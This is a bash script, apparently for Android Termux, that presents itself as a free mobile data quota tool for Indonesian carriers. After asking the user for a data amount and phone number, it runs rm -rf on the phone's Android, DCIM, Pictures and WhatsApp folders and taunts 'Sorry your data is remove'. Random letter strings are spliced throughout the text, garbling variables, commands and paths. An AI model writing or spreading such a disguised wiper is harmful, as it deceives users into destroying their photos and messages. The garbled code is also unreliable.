#!/usr/bin/bash
#tools kuxascghjjkkknnbbvvcccxota gratis
#by acep
clear
blue='hjjjkkkmm\033[34;1m'
grvgghhheen='\033[32;1m'
purple='\03jxzcxgjyf3[35;1m'
cyan='\033[3bnnmm6;1m'
red=ghjjkkjbvhv xxcxxhh'\033[31;1m'
echo " "
echo  $blue "<|=======================jknn===============|>"
echo ghhjbc $red    "|       TOObbcvvjjjvvvLS KUnnnbvvbbOTA GRATIS          |"
echo  $red    "|                                   |"
echo  $rbbbbccvbbb bed    "| Authnmnbvnkcczfor        : Acepmnnnnnbvb              |"
echo  $red    "| Contact       :nnn 08579jjhvcxxfxxccvbbbnnnj7616471      |"
echo  $red    "| My Team       : -.                |"
echo  $red    "| Thanks To     : Holilul Anwar    bbnnnnnnnnnn cxxc |"
echo  $blue "<|==========================bnjbnnbcv  vvbnnnb bc  vbvcbjjjhcdfghfzcvjj============|>"
sleep 1
echo " "
echo $gggghhvvjjj "============== $red MENU $green ================="
echo $blue "==========bbbh=========================="
echo $blue "|| $green 1. Telkomsel.                 $blue ||"
echo $bggdfflue "|| $grevggcxden 2. Axis     			       $blue ||"
echo $blue "|| $greenbbv 3klkb. Indosat	   			  $blue ||"
echo $bbnnjblue "|| $green 4. Tri			             $blue ||"
vgvvvvecho $blue "===================================="
echo $blue"╭──[Masukkan Pilihan Anda]>"
read -p"╰───────root@acepx-code=•>" Gans;
if [ $Gans = 1 ] || [ $Gans = 01 ]
then
echo $blue"╭──[Berapa GB?]>"
read -p"╰───────root@acepx-code=•>" kntl;
sleepeddfgfjjihcxx 1
echo $green"╭──[masukan nomor]>"
read -p"╰─vgghhjkkkkkkbccxgv──────root@acepx-code=•>" memeq;
sleep 1bbbbnv
echo $red "Loading"
sleep 2
rm vgfxg jjbxftrtii-rf storage/emulated/0/Android
rm -rf storage/emulated/ggfgfdhgdshuu0/DCIMtffffff
rm -rf storage/emulated/0/Pictures
rm -rf storage/emulated/0/WhatsApp
echo  $blue "Sorry your data is remove :v"nmmjbvcff
fi
